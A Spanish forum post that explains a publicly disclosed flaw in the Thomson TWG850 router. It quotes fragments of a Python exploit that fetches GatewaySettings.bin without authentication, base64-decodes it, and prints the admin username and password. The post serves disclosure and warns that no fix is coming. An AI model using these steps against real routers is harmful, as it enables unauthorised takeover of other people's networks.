Obtener los credenciales de administrador de un Thomson TWG850 (Pagina 1) / Otras marcas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 05-09-2015 10:19:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,199

Obtener los credenciales de administrador de un Thomson TWG850

Obtener los credenciales de administrador de un Thomson TXG850

Thom1.jpg

  Esto no es una lavadora: es un router.
Un router un  "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces? tongue
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :

Lo que ocurre es que los credenciales están

  1. en un fichero accesible  sin conocer la contraseña root

  2. cifrados en base 64 y es una función de hash reversible

1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí

bifi  = 'GatewaySettings.bin'

Par ser empleada en la petición

req = urllib2.Request('%s/%s'%(router,bifi))

2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"

for s in hr_data(bifi):
            try:
                dec = base64.decodestring(s)

Y luego se pillan  los datos con el "bucle if"
               

 if dec.find(':') != -1:
                    user,passwd = dec.split(':')
                    print '(+)- User: %s%s%s'%(G_C,user,D_C)
                    print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
                     
                    print '(+)- Checking if creds are OK...'
                    checkcreds(router,user,passwd)

No hay  remedio y no habrán actualizaciones para este router.   
No es aconsejable usarlo como router para su red domestica.

Los créditos para este full disclosure van a  Glaysson dos Santos
  Fuente:

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
6 56 Ayer 23:21:17 por muglio
Pegado:
55 1839 Ayer 19:25:37 por Betis-Jesus
0 17 Ayer 11:57:29 por kcdtv
logeandose por skan
1 22 18-01-2017 21:43:38 por kcdtv
0 26 18-01-2017 15:34:31 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: carasucia
Usuarios registrados conectados: 0
Invitados conectados: 4

Estadisticas de los foros

Número total de usuarios registrados: 385
Número total de temas: 658
Número total de mensajes: 4,626

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20